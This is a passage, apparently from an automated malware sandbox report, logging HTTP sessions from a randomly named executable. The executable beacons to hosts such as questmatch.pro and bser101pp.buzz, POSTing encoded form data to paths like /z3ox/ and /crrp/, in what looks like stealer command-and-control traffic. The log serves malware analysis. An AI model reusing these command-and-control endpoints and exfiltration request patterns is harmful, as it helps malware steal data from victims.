                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        44192.168.2.950018185.27.134.206806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:35.057307959 CET346OUTGET /cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:23:36.403729916 CET1181INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:36 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 980
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        45192.168.2.950019104.21.62.184806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:42.037542105 CET598OUTPOST /z3ox/ HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.questmatch.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.questmatch.pro/z3ox/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 4e 70 66 4d 57 71 5a 2f 6e 43 2f 45 63 74 68 49 57 33 54 48 69 43 43 41 48 30 69 6d 41 79 47 6d 43 54 69 66 54 2b 67 58 32 4e 6f 2f 52 72 64 79 33 71 41 33 76 37 78 70 64 4f 2b 73 2f 55 7a 70 4a 6d 7a 31 79 6c 4e 64 45 32 43 6d 7a 36 68 52 56 76 6f 79 34 55 4d 78 69 66 54 37 71 79 42 7a 71 36 69 35 63 50 33 4a 73 51 45 56 57 37 45 39 78 66 4b 77 77 53 62 39 6e 69 56 41 31 49 61 67 62 6c 73 78 61 77 48 51 73 45 6d 48 64 61 30 6e 41 31 74 72 46 41 50 7a 2f 6e 32 35 75 66 35 58 62 59 32 47 44 34 5a 32 31 66 4f 32 2f 46 61 67
                                                                                                                        Data Ascii: bBw=aT9t+g+JeI7WNpfMWqZ/nC/EcthIW3THiCCAH0imAyGmCTifT+gX2No/Rrdy3qA3v7xpdO+s/UzpJmz1ylNdE2Cmz6hRVvoy4UMxifT7qyBzq6i5cP3JsQEVW7E9xfKwwSb9niVA1IagblsxawHQsEmHda0nA1trFAPz/n25uf5XbY2GD4Z21fO2/Fag
                                                                                                                        Nov 21, 2024 16:23:43.312037945 CET1236INHTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:43 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 8a1e2e69-cbb9-4f7c-80ed-f58e88aa313c
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=epQwjXrIwDt4byp1fj9cEQ2Sdx6pIxVjFeKdiDNbLsK7R8mGVFP%2FZ%2Bi67DqlqK2ruOR%2FvILlEVPYekqk6xXGWfFB7%2FMVNs4q3uFaWCbeEov1jU0xK7dL2x5MkivhssH1F0VeKOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aeb96fec7d0c-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cd 0a c2 30 10 06 5f 25 7c e7 96 5a 5b 35 cd 03 08 5e 54 d0 9b 78 d8 26 1b 2d c6 2c a4 2d f8 43 df 5d 8a e7 19 86 f9 a2 15 f7 86 89 63 08 19 38 25 49 3d cc 17 56 1c c3 d4 8b 3a 43 a4 27 c3 60 2f 83 da ca 18 1d 32 38 1e a8 0b 3d cc 05 7b 51 77 8a 2e 70 52 7e a6 ca 4b 52 c7 c3 e9 ac 8a 4f
                                                                                                                        Data Ascii: b5$0_%|Z[5^Tx&-,-C]c8%I=V:C'`/28={Qw.pR~KRO
                                                                                                                        Nov 21, 2024 16:23:43.312063932 CET80INData Raw: 25 af 02 d7 69 f6 db f1 b6 8b 5e fe e9 94 38 d0 d0 49 dc 39 18 68 2a 79 c9 eb 26 b7 6d db e4 b5 df d8 5c 2f d8 e5 7e a5 59 6b a2 aa ac 2c 32 f4 03 d9 c7 39 91 e5 ff ed 34 fd 00 00 00 ff ff 03 00 b1 e5 32 9a bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: %i^8I9h*y&m\/~Yk,29420


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        46192.168.2.950020104.21.62.184806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:44.702689886 CET622OUTPOST /z3ox/ HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.questmatch.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.questmatch.pro/z3ox/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 63 35 50 4d 56 4e 46 2f 75 43 2f 44 5a 74 68 49 45 33 54 4c 69 43 2b 41 48 32 50 6a 42 42 69 6d 44 32 4f 66 55 37 55 58 37 74 6f 2f 65 37 64 33 35 4b 41 43 76 37 39 66 64 50 43 73 2f 53 66 70 4a 6e 44 31 7a 55 4e 65 48 47 44 41 6f 4b 68 54 52 76 6f 79 34 55 4d 78 69 62 44 52 71 79 4a 7a 71 4a 36 35 66 75 33 4b 79 41 45 57 66 62 45 39 36 2f 4b 4b 77 53 61 53 6e 6e 4d 72 31 4f 65 67 62 6e 30 78 5a 6c 7a 54 33 55 6d 46 5a 61 31 4e 42 46 74 75 4a 52 58 37 38 47 6d 4f 37 4d 42 76 56 5a 4b 59 53 4b 51 74 67 49 4f 52 34 69 54 49 4e 51 6d 69 6a 38 4d 34 48 6c 4f 6f 69 55 43 7a 33 73 6a 75 4a 67 3d 3d
                                                                                                                        Data Ascii: bBw=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBimD2OfU7UX7to/e7d35KACv79fdPCs/SfpJnD1zUNeHGDAoKhTRvoy4UMxibDRqyJzqJ65fu3KyAEWfbE96/KKwSaSnnMr1Oegbn0xZlzT3UmFZa1NBFtuJRX78GmO7MBvVZKYSKQtgIOR4iTINQmij8M4HlOoiUCz3sjuJg==
                                                                                                                        Nov 21, 2024 16:23:46.146347046 CET1236INHTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:45 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 877f869d-e1be-4a7d-a30a-a283ec793ede
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7zbUUpuOvlSvDbnIcZjgdnrJrq%2Ba0PHksUrIm6JbBSr8SbcBjgDXM8xKR9PhmB4KM477kfGKQPjBkd3jOaX0KPPOMBhFL5C%2FguDU9apvpDDB3%2FmvrFA2iiubbYWjgSBNUbq44o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aecacb980f68-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=16177&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 62 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e c1 0a 82 40 14 45 7f 65 b8 6b 87 2c 25 6d 3e 20 68 53 41 ee a2 c5 d3 f7 2c 69 9a 07 a3 42 25 fe 7b 84 eb 73 38 9c 09 b5 f2 07 2e 8c de 27 90 18 35 f6 70 13 1a 65 81 cb d3 3c 41 a0 97 c0 e1 a8 83 d9 eb 18 18 09 58 06 ea 7c 0f 77 c5 51 cd 83 02 7b 89 a6 fd 53 d3 6a 34 e7 d3 a5 32 ab 6f a6 ef
                                                                                                                        Data Ascii: b4$@Eek,%m> hSA,iB%{s8.'5pe<AX|wQ{Sj42o
                                                                                                                        Nov 21, 2024 16:23:46.146656990 CET78INData Raw: 15 6e f3 df af c7 fb 21 b4 ba a4 63 14 4f 43 a7 e1 c0 70 28 8b a2 2d b7 3b b6 b2 ae c5 e6 54 b0 a5 2c 25 4b 9b 32 93 a6 d8 65 c2 82 04 fd 40 cd b3 8a d4 c8 72 3b cf 3f 00 00 00 ff ff 03 00 7f f5 6e b0 bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: n!cOCp(-;T,%K2e@r;?n0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        47192.168.2.950021104.21.62.184806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:47.383749008 CET1635OUTPOST /z3ox/ HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.questmatch.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.questmatch.pro/z3ox/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 63 35 50 4d 56 4e 46 2f 75 43 2f 44 5a 74 68 49 45 33 54 4c 69 43 2b 41 48 32 50 6a 42 42 71 6d 44 45 47 66 53 63 49 58 36 74 6f 2f 59 4c 64 32 35 4b 41 6c 76 37 56 44 64 50 4f 61 2f 58 44 70 4b 42 66 31 30 68 74 65 51 32 44 41 33 36 68 53 56 76 70 6f 34 55 38 74 69 66 6e 52 71 79 4a 7a 71 4f 43 35 4c 76 33 4b 77 41 45 56 57 37 45 59 78 66 4c 45 77 53 43 6f 6e 6e 35 51 79 2b 2b 67 63 48 6b 78 66 54 76 54 37 55 6d 39 65 61 31 56 42 46 67 2b 4a 52 37 33 38 47 44 54 37 50 68 76 58 63 72 47 47 49 63 50 78 49 71 74 31 7a 4c 77 45 6d 65 66 6a 74 4e 78 51 6e 33 4e 6a 6b 50 39 78 66 4b 34 56 64 53 41 79 52 70 6c 56 4a 51 71 49 51 54 59 4d 66 4e 50 4d 2f 68 4b 49 35 4e 77 6b 39 6c 5a 54 33 54 37 6c 6c 48 4c 68 4b 34 79 62 38 70 75 71 47 79 30 59 79 73 56 6b 75 33 6e 47 75 5a 50 4a 33 4e 64 68 70 59 67 70 61 6d 34 45 49 59 51 44 62 55 34 56 42 37 67 59 7a 4d 53 77 44 4f 4d 68 42 6a 42 64 48 4a 30 71 6a 74 44 63 6a 55 55 52 42 65 36 50 35 6e 35 50 67 46 47 36 4c [TRUNCATED]
                                                                                                                        Data Ascii: bBw=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBqmDEGfScIX6to/YLd25KAlv7VDdPOa/XDpKBf10hteQ2DA36hSVvpo4U8tifnRqyJzqOC5Lv3KwAEVW7EYxfLEwSConn5Qy++gcHkxfTvT7Um9ea1VBFg+JR738GDT7PhvXcrGGIcPxIqt1zLwEmefjtNxQn3NjkP9xfK4VdSAyRplVJQqIQTYMfNPM/hKI5Nwk9lZT3T7llHLhK4yb8puqGy0YysVku3nGuZPJ3NdhpYgpam4EIYQDbU4VB7gYzMSwDOMhBjBdHJ0qjtDcjUURBe6P5n5PgFG6LNw3jqQ04I/UMdVhG1CkALLDeNcnJcn3DFIlpXlRLyWXTswCawyEKT0kBFGgDluV6n7fzepxmct/Y4W7FyQS+ymK/P1aFzWwGDUAcmi5RPLNIJ6lnvwRU90FfEI1FiWFKeZrSV9h+dul5s2d8ByETwpKvs/wf8XCfsjsZMLW4o0byzDp7c+hxLSPwaSs4wVXcM0v0M/igpCbTtkgreN/fAdTrzdFb7Wh7RbhbtuN+y3mccyZxSVInMRmig9wotPUfbbscNH9AAmfZs06aIhH3Me40LbgXU61ZrwkKhvf1M59hC9lTiB/1kq4v09R63sEIQCjkR1mgIW8EJKPbUhg1ZSqoLIwUoQLSaCUw6ACZazBfuNwRp2bg2CHYCPbqSH2qi2P9qduiTCYy5FcR/iCuXpdQ1K93WZ941gOeu37AQeKmInX5Oab9EESnVf0q25pDFv25LhqixPxRjy/4sSG1y0iR1OHB+eVw9G9+PcQPK8Ye5/98T81E9TEALK3QiAgWl7shNDhgzvWMhNxNpO7+XLRUpisaVywYXUuVEFiLhgp8Nb8h6B9bTsf5dQkBntqU6cVIMqpgX96ZJhHtb1Cp02pZGIBc9+NFyBpXEYC+n//3UpPevYghfaH6buHH6ZVj1Od5abw/6/LnSMKEHqbfv5zoYnzzsdkBuS [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:48.760806084 CET1236INHTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:48 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 8c7b566c-d0ba-4891-9051-7eac1f55bfa7
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n4hR30qa2BmAeYbtZrA4KWLe%2FG1wKQYFtvZwy5%2FT%2BG77%2Fq2AWvwTQw4vStdMrSnFFByC96RmCfQI6LZAlQu6WWU4xTFRCR0UHn%2FQneeboY74qK5rvVK4EAP4vJWtcfsmD9UXgS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aedb6c8c1871-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2402&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1635&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0a c2 30 14 06 af 12 be 75 4b 5b 6c ac e6 00 82 9b 2a d8 9d b8 78 f9 53 31 e6 41 9a 82 5a 7a 77 11 d7 33 0c 33 43 b3 7d 43 c5 29 84 02 2e 25 4e 23 d4 0c c3 d6 41 b5 75 5b 20 d2 d3 41 a1 e7 2c 76 3c 45 8b 02 d6 65 ba 87 11 ea 8c 9e c5 8d a2 0d 2e 09 ff a3 c2 73 12 c7 c3 69 10
                                                                                                                        Data Ascii: b5$M0uK[l*xS1AZzw33C}C).%N#Au[ A,v<Ee.si
                                                                                                                        Nov 21, 2024 16:23:48.760831118 CET83INData Raw: d5 67 c5 af 0a 97 e5 e7 eb e9 ba 8f 9e ff e9 94 5c a0 7c e7 b8 b7 50 d8 98 4e cb f5 da 94 b6 d6 54 b6 9b 6d 53 6e 6b d9 94 9d 23 d3 78 29 b5 a7 0e 05 c6 4c e6 31 24 32 ee 7f bb 2c 5f 00 00 00 ff ff 03 00 9a 54 75 2d bc 00 00 00 0d 0a 30 0d 0a 0d
                                                                                                                        Data Ascii: g\|PNTmSnk#x)L1$2,_Tu-0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        48192.168.2.950022104.21.62.184806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:50.057804108 CET340OUTGET /z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhUirL/6ZuF4cRwiIE0+ehkyVFqeLMeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.questmatch.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:23:51.334629059 CET1096INHTTP/1.1 404
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:51 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Origin
                                                                                                                        Vary: Access-Control-Request-Method
                                                                                                                        Vary: Access-Control-Request-Headers
                                                                                                                        X-Correlation-ID: 8721ec9c-db07-4982-9fd4-f49803025f98
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        CF-Connecting-IP: 8.46.123.75
                                                                                                                        CF-IPCountry: US
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8X2fbJy6mlke3ZOAmlxTrrAUrul1fWp%2Bf1bSBMbmQ3so8U1tTvUFvouRxmVSadUIP6S%2BcYgGT12MdCUCVn37nNjBCtz0pWVqG1PYECPPQV5blgzCrdS1iYf6ldM0V0lN473fpY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61aeeb8c9a42a6-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=340&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Nov 21, 2024 16:23:51.335769892 CET198INData Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f
                                                                                                                        Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /z3ox/"]},"debugInfo":{"correlationId":"8721ec9c-db07-4982-9fd4-f49803025f98","stackTrace":null}}0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        49192.168.2.950023104.21.58.90806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:56.810878038 CET598OUTPOST /crrp/ HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.bser101pp.buzz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
